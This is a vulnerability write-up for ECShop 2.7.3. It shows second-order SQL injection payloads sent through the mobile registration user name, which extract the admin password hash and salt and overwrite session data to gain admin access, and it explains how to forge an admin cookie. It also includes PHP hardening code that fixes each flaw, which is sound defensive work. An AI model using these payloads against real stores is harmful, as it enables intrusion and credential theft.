ECShop WAP module registration second-order injection

Affected version

ECShop 2.7.3

Exploitation

/mobile/user.php?act=register

Capture the request and change the registration user name to

',email=(select password from ecs_admin_user limit 0,1),ip='

Visit /flow.php?step=consignee to obtain the administrator password hash

Then submit

',email=(select ec_salt from ecs_admin_user limit 0,1),ip='

Visit /flow.php?step=consignee to obtain the salt
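The two registration steps above work because the user name stored at registration is later concatenated into another query (the consignee update), so escaping at input time alone does not help. The following is an added hardening example, not ECShop's own code: the `$db` mysqli connection, the `ecs_users` column set used in the UPDATE, and the `update_consignee` signature are assumptions. It rejects names that cannot be legitimate and binds every value at the later query, whether it came from the request or from the database.

```php
<?php
// Added hardening example (not ECShop's code). Assumes a mysqli connection $db
// and the ecs_users column names used below; the consignee UPDATE column set is
// a hypothetical stand-in for the real one.

// A whitelist never lets the quote and SQL syntax the payloads rely on through.
function valid_user_name(string $name): bool
{
    return (bool) preg_match('/^[\p{L}\p{N}_\-]{3,32}$/u', $name);
}

// Second-order injection happens when a stored value is concatenated into a
// later query. Binding every parameter, including ones read back from the
// database, removes the problem regardless of how the value was stored.
function update_consignee(mysqli $db, int $userId, string $userName, string $email, string $ip): bool
{
    $stmt = $db->prepare(
        'UPDATE ecs_users SET user_name = ?, email = ?, last_ip = ? WHERE user_id = ?'
    );
    $stmt->bind_param('sssi', $userName, $email, $ip, $userId);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Registration handler sketch: validate first, bind always, never store plain md5.
function register(mysqli $db, string $name, string $email, string $password, string $ip): bool
{
    if (!valid_user_name($name) || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    $stmt = $db->prepare(
        'INSERT INTO ecs_users (user_name, email, password, reg_time, last_ip) VALUES (?, ?, ?, ?, ?)'
    );
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $now  = time();
    $stmt->bind_param('sssis', $name, $email, $hash, $now, $ip);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Example call from a handler (constructed input, placeholder credentials):
if (PHP_SAPI !== 'cli' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    $db = new mysqli('localhost', 'ecshop', 'secret', 'ecshop');
    $ok = register(
        $db,
        (string) ($_POST['username'] ?? ''),
        (string) ($_POST['email'] ?? ''),
        (string) ($_POST['password'] ?? ''),
        $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0'
    );
    http_response_code($ok ? 200 : 400);
}
```

With `valid_user_name` in place the payloads shown above are rejected before they are stored; with `update_consignee` binding its parameters, even a name that slipped into the table cannot change the shape of the later UPDATE.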

1: A cookie can be constructed directly to enter the admin backend

Cookie verification process

if (!empty($ec_salt))
{
    /* Check whether the password is correct */
    $sql = "SELECT user_id, user_name, password, last_login, action_list, last_login,suppliers_id,ec_salt".
        " FROM " . $ecs->table('admin_user') .
        " WHERE user_name = '" . $_POST['username']. "' AND password = '" . md5(md5($_POST['password']).$ec_salt) . "'";
}
else
{
    /* Check whether the password is correct */
    $sql = "SELECT user_id, user_name, password, last_login, action_list, last_login,suppliers_id,ec_salt".
        " FROM " . $ecs->table('admin_user') .
        " WHERE user_name = '" . $_POST['username']. "' AND password = '" . md5($_POST['password']) . "'";
}

The system then sets the cookie

setcookie('ECSCP[admin_id]', $row['user_id'], $time);
setcookie('ECSCP[admin_pass]', md5($row['password'] . $_CFG['hash_code']), $time);

hash_code is obtained with

SELECT value FROM ecs_shop_config WHERE code='hash_code'
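The login check above concatenates `$_POST['username']` into the SQL text, and the admin cookie is derived only from values that live in the database (`password` and `hash_code`), so anyone who can read the database can forge it. The following is an added hardening example, not ECShop's own code: it assumes a mysqli connection `$db` (with mysqlnd for `get_result`), the `ecs_admin_user` columns shown above, and a server-side PHP session in place of the `ECSCP[admin_pass]` cookie. The password scheme is kept as the page describes it so the example stays a drop-in check; `hash_equals` replaces the comparison inside the WHERE clause.

```php
<?php
// Added hardening example (not ECShop's code). Assumes a mysqli connection $db,
// the ecs_admin_user columns shown on the page, and PHP sessions instead of
// the ECSCP[admin_pass] cookie.

function find_admin(mysqli $db, string $userName): ?array
{
    // Bound parameter: the user name never becomes part of the SQL text.
    $stmt = $db->prepare(
        'SELECT user_id, user_name, password, ec_salt, action_list FROM ecs_admin_user WHERE user_name = ?'
    );
    $stmt->bind_param('s', $userName);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

function verify_admin_password(array $row, string $password): bool
{
    // Legacy scheme from the page: md5(md5(pw) . ec_salt) when a salt exists, md5(pw) otherwise.
    // Kept only so the check is a drop-in; password_hash() is the right scheme for new hashes.
    $expected = ($row['ec_salt'] !== null && $row['ec_salt'] !== '')
        ? md5(md5($password) . $row['ec_salt'])
        : md5($password);
    // Constant-time comparison in PHP instead of a string compare inside the query.
    return hash_equals($row['password'], $expected);
}

function admin_login(mysqli $db, string $userName, string $password): bool
{
    $row = find_admin($db, $userName);
    if ($row === null || !verify_admin_password($row, $password)) {
        return false;
    }
    // Server-side session, fresh id on privilege change. Nothing derived from
    // the password hash or hash_code leaves the server, so reading the database
    // no longer yields a forgeable admin cookie.
    session_regenerate_id(true);
    $_SESSION['admin_id']         = (int) $row['user_id'];
    $_SESSION['admin_login_time'] = time();
    return true;
}

// Example handler (placeholder credentials):
if (PHP_SAPI !== 'cli' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    session_start();
    $db = new mysqli('localhost', 'ecshop', 'secret', 'ecshop');
    $ok = admin_login($db, (string) ($_POST['username'] ?? ''), (string) ($_POST['password'] ?? ''));
    http_response_code($ok ? 200 : 401);
}
```

The query is fixed text, so the username can no longer alter it; the session carries only an id, so the `hash_code` value the page extracts from `ecs_shop_config` has nothing to sign.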

2: The current user's session can be updated into an administrator session

First visit the admin backend once so that a session is generated

Then use the injection point again to submit an email address like this

',adminid='1',data='a:1:{s:11:"action_list";s:3:"all";}'#

Refresh the admin page and you are logged into the backend directly
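Method 2 works because the session store sits in the same database the injection can write to: both the admin id and the serialized `action_list` live in a row that the UPDATE can overwrite. The following is an added hardening example, not ECShop's own code, and it assumes a mysqli connection `$db`, the `ecs_admin_user` columns shown earlier, and a secret `ADMIN_SESSION_KEY` loaded from a configuration file rather than from `ecs_shop_config` (which the page shows can be read through the injection). It binds the admin id to the session id with an HMAC that a write to the sessions table cannot produce, and reloads privileges from `ecs_admin_user` on every request instead of trusting serialized session data. `bind_admin_session` would be called from the login handler after the password check.

```php
<?php
// Added hardening example (not ECShop's code). Assumes a mysqli connection $db,
// the ecs_admin_user columns shown on the page, and ADMIN_SESSION_KEY loaded
// from a config file, never from the database.

const ADMIN_SESSION_KEY = 'replace-with-a-random-32-byte-key-from-config'; // placeholder

function admin_session_sig(int $adminId): string
{
    // Ties the admin id to this particular session id under a key the database does not hold.
    return hash_hmac('sha256', session_id() . ':' . $adminId, ADMIN_SESSION_KEY);
}

// Called once after a successful password check.
function bind_admin_session(int $adminId): void
{
    session_regenerate_id(true);
    $_SESSION['admin_id']  = $adminId;
    $_SESSION['admin_sig'] = admin_session_sig($adminId);
}

// Called on every admin request. Returns the admin row or null.
function current_admin(mysqli $db): ?array
{
    $adminId = $_SESSION['admin_id'] ?? null;
    $sig     = $_SESSION['admin_sig'] ?? '';
    if (!is_int($adminId) || $adminId <= 0 || !is_string($sig)) {
        return null;
    }
    // An adminid written straight into the session row carries no valid MAC;
    // a MAC copied from another session fails because it covers the session id.
    if (!hash_equals(admin_session_sig($adminId), $sig)) {
        return null;
    }
    // Privileges come from the admin table, so a serialized action_list in the
    // session data (the a:1:{...} payload above) is never consulted.
    $stmt = $db->prepare('SELECT user_id, user_name, action_list FROM ecs_admin_user WHERE user_id = ?');
    $stmt->bind_param('i', $adminId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

function admin_can(array $admin, string $action): bool
{
    if ($admin['action_list'] === 'all') {
        return true;
    }
    return in_array($action, explode(',', $admin['action_list']), true);
}

// Example guard at the top of an admin page (placeholder credentials):
if (PHP_SAPI !== 'cli') {
    session_start();
    $db    = new mysqli('localhost', 'ecshop', 'secret', 'ecshop');
    $admin = current_admin($db);
    if ($admin === null || !admin_can($admin, 'shop_config')) {
        http_response_code(403);
        exit;
    }
}
```

The key lives outside the database, so the two things the injection can reach (the session row and `ecs_shop_config`) are no longer sufficient to mint an admin session; `action_list` is re-read from `ecs_admin_user`, so the `data` field of the session row carries no authority.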